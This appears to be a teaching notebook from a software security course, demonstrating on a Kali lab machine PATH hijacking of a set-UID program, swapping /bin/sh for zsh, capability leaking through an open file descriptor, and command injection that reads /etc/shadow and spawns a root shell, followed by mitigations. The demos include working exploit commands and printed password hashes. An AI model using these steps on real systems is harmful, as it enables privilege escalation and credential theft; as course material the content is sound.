# Command Injection Vulnerability, Attacks and Mitigations

## Environment Variables Pitfalls
- there's no known inherent vulnerability on environment variables
- like many features of OSes, they just provide a convenient way to manage configuration settings

### Security Risks
- env vars are accessible by processes on the system; means that sensitive information stored in them such as API keys or database credentials could potentially be exposed if proper security measures not in place

### Accidental Overwriting
- since env vars are dynamic and can be changed at runtime, there's a risk of accidental overwriting
- a misconfigured or malicious process might alter the values of critical variables, leading to unexpected behavior of applications

### Debugging Challenges
- in complex systems, tracing the source of a problem can be difficult

### Dependency on External Configuration
- overreliance on environment variables for configuration settings can make it challenging to manage and version configurations, esp. in larger projects
- changes in configruations may require updates in multiple places, leading to potentital inconsistencies

### Lack of Encryption
- environment variables are typically stored in plaintext
- sensitive information if stored as env vars can be exposed

### Limited Access Control
- access control on env variables are ususally limited
- it can be challenging to ensure proper access control to preven unauthorized access and modification to sensitive variables

### Hard-Coding Pitfall
- care should be taken to access the hard-coded env vars in programs
- what if the values of the variables are modified by the malicios programs and processes?

## Environment Variables Exploitation Demo

- `today.cpp` program in `demos/envexploit` folder uses `system` API to rely on PATH variable to call date function
- can we force this program to read `/etc/passwd` file without modifying the program itself?

In [2]:
%pwd

'/home/kali/projects/SoftwareSecurity'

In [3]:
%cd ./demos/envexploit/

/home/kali/projects/SoftwareSecurity/demos/envexploit


In [4]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/envexploit


In [5]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 18 14:14 .
drwxr-xr-x 17 kali kali  4096 Jan 19 00:25 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali   146 Jan 18 17:51 date
-rwsr-sr-x  1 root kali 22632 Jan 18 13:57 today
-rw-r--r--  1 kali kali   304 Jan 27 22:37 today.cpp


In [6]:
! cat today.cpp

// Wrapper program for bash date program

#include <cstdio>
#include <cstring>
#include <cstdlib>

using namespace std;

int main(int argc, char* argv[]) {
    printf("Today is: ");
    // must flush stdout so system call's result is printed after
    fflush(stdout); 
    system("date");
    return 0;
}

In [7]:
! cat  Makefile

COMPILER = g++

COMPILER_FLAGS = -g -Wall -std=c++17

# the build target executable program name of your choice
PROGRAM_NAME = today

CPP_FILES = today.cpp

build:
	$(COMPILER) $(COMPILER_FLAGS) $(CPP_FILES) -o $(PROGRAM_NAME)

# make clean rule
# delete object and binary files
clean:
	rm -f $(PROGRAM_NAME) *.o


In [8]:
! make

g++ -g -Wall -std=c++17 today.cpp -o today


In [9]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 28 16:00 .
drwxr-xr-x 17 kali kali  4096 Jan 19 00:25 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali   146 Jan 18 17:51 date
-rwxr-xr-x  1 kali kali 22632 Jan 28 16:00 today
-rw-r--r--  1 kali kali   304 Jan 27 22:37 today.cpp


In [10]:
! ./today

Today is: Sun Jan 28 16:00:38 EST 2024


In [11]:
! which date

/usr/bin/date


## Exploitation of PATH env variable

- today program uses `system` API to call `date` program
- system finds `date` program by search the `PATH` variable which is in `/usr/bin/date`
- create your own "date" program; that does whatever you want it to do
- update the PATH so it finds your "date" program before finding system's `/usr/bin/date`
- you can write your program in whatever language of your choice
    - bash script is the easiest in this case
- see `date` script in the `demo/envexploit` folder
- make the program executable
- update the PATH from Terminal and run the today program

In [12]:
! cat date

#! /bin/sh

# date program that reads /etc/passwd file

if cat /etc/passwd; then
    echo "Woohoo I got it!"
else
    echo "Command failed :("
fi


In [13]:
! chmod +x date

In [14]:
! ls -al date

-rwxr-xr-x 1 kali kali 146 Jan 18 17:51 date


In [15]:
! ./date

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:106:MySQL Server,,,:/

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ export PATH=$PWD:$PATH 
                                                                                                     
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ echo $PATH            
/home/kali/projects/SoftwareSecurity/demos/envexploit:/home/kali:/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/kali//home/kali/bin

(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ ./today
Today is: root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

kali:x:1000:1000:kali,,,:/home/kali:/usr/bin/zsh
bob:x:1001:1001:,,,:/home/bob:/bin/bash
Woohoo I got it!
```

## Attack Surfaces on Set-UID Programs

- the impact of exploitation of set-uid programs can be severe
- can compromise all 3 CIA triads
    - what are CIA triads?

![Attack Surfaces](./media/setuid-attacks.png)

### Attacks Via User Inputs

#### Buffer Overflow
- covered in depth later in Bufffer Overflow chapters
- overflow a buffer to run arbitrary malicious code

#### Format String Vulnerability
- covered in dpeth later in Format String chapter
- change program behavior using user inputs for format strings

### Attacks via System Inputs
- covered in Race Condition chapter

### Attacks via Environment Variables
- if the program (e.g., today program) is set-uid, you can exploit it to execute any program as the owner of the program
- if the program is root, anyone who can run this program gains root's privileges during its execution
    - esentially, it typically escalates users' privileges and that can have serious consequences
- `system(command)` is a wrapper for `/bin/sh`
    - it is invoked as `/bin/sh -c command`
    - i.e., it invokes `/bin/sh` and and asks the shell to execute the command
- `system()` passes the env vars of calling process to the new program `/bin/sh`
- in newer version of Linux (Ubuntu 20.04 and Kali 2023, e.g.), `/bin/sh` is actually a symbolic link pointing to `/bin/dash`
- `/bin/dash` has a conutermeasure that prevents itself from being executed in a Set-UID process
    - if dash detects that it is being executed in a Set-UID prorcess, it immediately changes the effective User ID to the process's real ID -- essentially dropping the privilege
- if we update the `date` script and try to read priviledged `/etc/shadow` file, it'll fail!
- we can however update the softlink  `/bin/sh` to point to `/bin/zsh` which doesn't have the countermeasure

In [10]:
! ls -al /bin/sh

lrwxrwxrwx 1 root root 4 Jun 21  2023 /bin/sh -> dash


In [4]:
! echo kali | sudo -S chown root today

[sudo] password for kali: 

In [5]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 18 14:14 .
drwxr-xr-x 15 kali kali  4096 Jan 18 13:56 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali    97 Jan 18 14:10 date
-rwxr-xr-x  1 root kali 22632 Jan 18 13:57 today
-rw-r--r--  1 kali kali   304 Jan 18 13:51 today.cpp


In [7]:
! echo kali | sudo -S chmod +s today

[sudo] password for kali: 

In [8]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 18 14:14 .
drwxr-xr-x 15 kali kali  4096 Jan 18 13:56 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali    97 Jan 18 14:10 date
-rwsr-sr-x  1 root kali 22632 Jan 18 13:57 today
-rw-r--r--  1 kali kali   304 Jan 18 13:51 today.cpp


In [16]:
! cat date 

#! /bin/sh

# date program that reads /etc/passwd file

if cat /etc/shadow; then
    echo "Woohoo I got it!"
else
    echo "Command failed :("
fi


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ ./today
Today is: cat: /etc/shadow: Permission denied
Command failed :(
```

In [13]:
# let's create a soft link /bin/sh pointing to /bin/zsh
! echo kali | sudo -S ln -sf /bin/zsh /bin/sh

[sudo] password for kali: 

In [14]:
! ls -al /bin/sh

lrwxrwxrwx 1 root root 8 Jan 18 17:46 /bin/sh -> /bin/zsh


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ ./today
Today is: root:!:19662:0:99999:7:::
...
kali:$y$j9T$K/agt9PK0eYweoRVbd9yK0$6BUblkWhNb00ZJWw7nYm0fZL1bpF.1BAs5h0CRF4xj2:19662:0:99999:7:::
bob:$y$j9T$KoIINXes24L0Z2qTeAdEX0$aNnlXFBUXuSZrsiCKPFPCxMIz/KNoz0gIzFnOppN2F1:19739:0:99999:7:::
Woohoo I got it!
```

## Capability Leaking

- in some cases, privileged programs downgrade themselves during execution
- E.g., **su** program

### su
- su is a privileged set-uid program
- allows user to switch to another user (say user1 to user2)
- program starts with EUID as root and RUID as user1
- after password verification, both EUID and RUID becomes user2's (via privilege downgrading)
- such programs may lead to capability leaking if not implemented correctly
    - programs may not clean up privileged capabilities before downgrading

### Attacks via Capability Leaking
- let's look at an example program provided in `demos/capleak/` folder
- program opens a file in `/etc` in **write/append** mode
- program must be root setuid to be able to write to the `/etc` folder
- program downgrades the privilege with the RUID of the user
- it then executes `/bin/sh`
- conviniently, file descriptor value is also printed
- run the program from the Terminal to get the shell 

In [18]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/envexploit


In [19]:
%cd ../capleak

/home/kali/projects/SoftwareSecurity/demos/capleak


In [21]:
! ls -al

total 16
drwxr-xr-x  2 kali kali 4096 Jan 18 22:32 .
drwxr-xr-x 16 kali kali 4096 Jan 18 18:00 ..
-rw-r--r--  1 kali kali  394 Jan 18 22:10 Makefile
-rw-r--r--  1 kali kali  721 Jan 18 22:13 capleak.cpp


In [24]:
! cat capleak.cpp

// https://github.com/seed-labs/seed-labs/blob/master/category-software/Environment_Variable_and_SetUID/Labsetup/cap_leak.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

using namespace std;

int main(int argc, char* argv[]) {
    int fd;
    char *v[2];
    
    fd = open("/etc/xyz", O_RDWR | O_APPEND | O_CREAT); 
    if (fd == -1) {
        printf("Failed to open /etc/xyz\n");
        exit(1);
    }
    // print out the file descriptor value
    printf("fd is %d\n", fd);
    // FIXME - close the file
    // close(fd);
    // downgrade the privilege my making the effective uid the same as the real uid
    setuid(getuid());
    // execute /bin/sh
    v[0] = "/bin/sh"; v[1] = 0;
    execve(v[0], v, 0);
    return 0;
}


In [22]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -std=c++17 capleak.cpp -o capleak
[01m[Kcapleak.cpp:[m[K In function ‘[01m[Kint[01;32m[K main[m[K(int, char**)[m[K’:
   24 |     v[0] = [01;35m[K"/bin/sh"[m[K; v[1] = 0;
      |            [01;35m[K^~~~~~~~~[m[K
sudo chown root capleak
sudo chmod +s capleak


In [23]:
! ls -al

total 48
drwxr-xr-x  2 kali kali  4096 Jan 18 22:33 .
drwxr-xr-x 16 kali kali  4096 Jan 18 18:00 ..
-rw-r--r--  1 kali kali   394 Jan 18 22:10 Makefile
-rwsr-sr-x  1 root root 30384 Jan 18 22:33 capleak
-rw-r--r--  1 kali kali   721 Jan 18 22:13 capleak.cpp


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/capleak]
└─$ ./capleak 
fout is 3
$ echo ABCDEF                                                                                              
ABCDEF
$ echo ABCDEF >& 3                                                                                       
$ cat /etc/xyz                                                                                             
aaa
aaaa
ABCDEF
$ exit
```

## Fix the Vulnerability

- close/destroy the file description before dropping the privelege

## Capbility Leaking in OS X - Case Study

- OS X Yosemite found vulnerable to privilege escalation attack related to capability leaking in July 2015 ( OS X 10.10 )
- added features to dynamic linker dyld 
    - DYLD_PRINT_TO_FILE environment variable
- the dynamic linker can open any file, so for root-owned Set-UID programs, it runs with root privileges 
- the dynamic linker dyld, does not close the file leading to capability leaking vulnerability


## Command Injection

- programs' often takes input from users
- if the users' input is not validated and sanitized, data can be converted into command name
    - data is then executed as command
- SQL injection is a type of command injection attack very common in SQL-driven web applications
- see `catall.cpp` file in `demos/injection` folder

In [25]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/capleak


In [26]:
%cd ../injection

/home/kali/projects/SoftwareSecurity/demos/injection


In [27]:
! ls -al

total 12
drwxr-xr-x  2 kali kali 4096 Jan 19 00:25 .
drwxr-xr-x 17 kali kali 4096 Jan 19 00:25 ..
-rw-r--r--  1 kali kali  393 Jan 19 00:27 Makefile
-rw-r--r--  1 kali kali    0 Jan 19 00:24 catall.c


In [29]:
! cat catall.cpp

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
  char *v[3];
  char *command;

  if(argc < 2) {
    printf("Usage: calall <file_path>.\n");
    return 1;
  }

  v[0] = "/bin/cat"; v[1] = argv[1]; v[2] = NULL;

  command = malloc(strlen(v[0]) + strlen(v[1]) + 2);
  sprintf(command, "%s %s", v[0], v[1]);

  // Use only one of the followings.
  system(command);
  // execve(v[0], v, NULL);

  return 0 ;
}

In [32]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -std=c++17 catall.cpp -o catall
[01m[Kcatall.cpp:[m[K In function ‘[01m[Kint[01;32m[K main[m[K(int, char**)[m[K’:
   16 |   v[0] = [01;35m[K"/bin/cat"[m[K; v[1] = argv[1]; v[2] = NULL;
      |          [01;35m[K^~~~~~~~~~[m[K
sudo chown root catall
sudo chmod +s catall


- you must use the "quotations" around the commands ";" separated arguments
- quotes ensure everything is passed as a single argument to the vulnurable program
- note, injecting /bin/zsh gives root but injecting  /bin/sh doesn not 

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/injection]
└─$ ./catall "adf; cat /etc/shadow"
/bin/cat: adf: No such file or directory
root:!:19662:0:99999:7:::
...
kali:$y$j9T$K/agt9PK0eYweoRVbd9yK0$6BUblkWhNb00ZJWw7nYm0fZL1bpF.1BAs5h0CRF4xj2:19662:0:99999:7:::
bob:$y$j9T$KoIINXes24L0Z2qTeAdEX0$aNnlXFBUXuSZrsiCKPFPCxMIz/KNoz0gIzFnOppN2F1:19739:0:99999:7::

(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/injection]
└─$ ./catall "adf; /bin/bash"
/bin/cat: adf: No such file or directory
bash-5.2$ whoami
kali
bash-5.2$ ./catall "asdf; /bin/bash"
/bin/cat: asdf: No such file or directory
bash-5.2$ exit
exit
bash-5.2$ exit
exit
                                                                                                                                                                                                                                                                                         
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/injection]
└─$ ./catall "adf; /bin/zsh" 
/bin/cat: adf: No such file or directory
x86_64-conda-linux-gnu# whoami
root
x86_64-conda-linux-gnu# id
uid=1000(kali) gid=1000(kali) euid=0(root) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),105(netdev),117(wireshark),120(bluetooth),133(scanner),140(kaboxer)
x86_64-conda-linux-gnu# 
```

## Mitigation

- avoid `system` call if possible
- use `execve` properly instead of `system` when executing system commands from C/C++ programs
- `execve` allows you to separate the command from the input data
- `exec` family of function is lower-level compared to system and allows for granular control on how the program should be executed
- allows you to pass your own environment variables in the third argument
- replaces the current process image with a new one, executing the specified program
- you need to provide full path to the executable and explictly pass an array of arguments
    - preventing the ENV VARS overriding attack 
- not all `exec` family funcions behave similarly
    - `execlp(), execvp(), execvpe()` duplicate the actions of the shell
    - these functions can be attacked using the PATH Environment Variable
    
```bash
execve(command_name, input_data_argument, env_variables);
```

- patch the `catall.cpp` program and try to exploit it again
- see `demos/injection/secure` folder for the secure version of `cat_all` program
- compile and try the command injection again...

In [34]:
! man execve

[4mexecve[24m(2)                     System Calls Manual                    [4mexecve[24m(2)

[1mNAME[0m
       execve - execute program

[1mLIBRARY[0m
       Standard C library ([4mlibc[24m, [4m-lc[24m)

[1mSYNOPSIS[0m
       [1m#include <unistd.h>[0m

       [1mint execve(const char *[4m[22mpathname[24m[1m, char *const _Nullable [4m[22margv[24m[1m[],[0m
                  [1mchar *const _Nullable [4m[22menvp[24m[1m[]);[0m

[1mDESCRIPTION[0m
       [1mexecve[22m() executes the program referred to by [4mpathname[24m.  This causes the
       program  that  is  currently being run by the calling process to be re‐
       placed with a new program, with  newly  initialized  stack,  heap,  and
       (initialized and uninitialized) data segments.

       [4mpathname[24m  must be either a binary executable, or a script starting with
       a line of the form:

           [1m#![4m[22minterpreter[24m [optional-arg]

       For details of the latter ca

```bash
(base) ┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/injection/secure]
└─$ ./secure_catall "adfasdf; ls -al"
/bin/cat: 'adfasdf; ls -al': No such file or directory
  
  
(base) ┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/injection/secure]
└─$ ./secure_catall "adfasdf; /bin/cat /etc/passwd"
/bin/cat: 'adfasdf; /bin/cat /etc/passwd': No such file or directory
```

## Invoking External Commands in Other Languages

- risks of invoking external commands or command injection is not limited to C/C++ programs
- goal is to avoid problems similar to those caused by the system() function
- many languages allow system API, such as PHP, Perl, Python, etc.

## Major Principles for Mitigating Command Injection Attacks

### Principle of Isolation
    
- don't mix code with data
- various attacks such as system() code execution, XSS (Cross-site scripting), SQL Injection, Buffer Overflows are consequences of mixing code with data

### Principle of Least Privilege

- a privileged program should be given the just the right amount of power required to perform its tasks
- disable the privileges (temporarily or permenanently) when a privileged program doesn't need those
- in Linux, seteuid() and setuid() can be used to downgrade/upgrade privilege when needed
    - different OSes may provide different APIs
    
### Principle of Cleanup After

- discard the resources after they're done being used
- free/release memory used by dynamic variables created using **new**, **malac**, etc.
- close files and resources after their usages
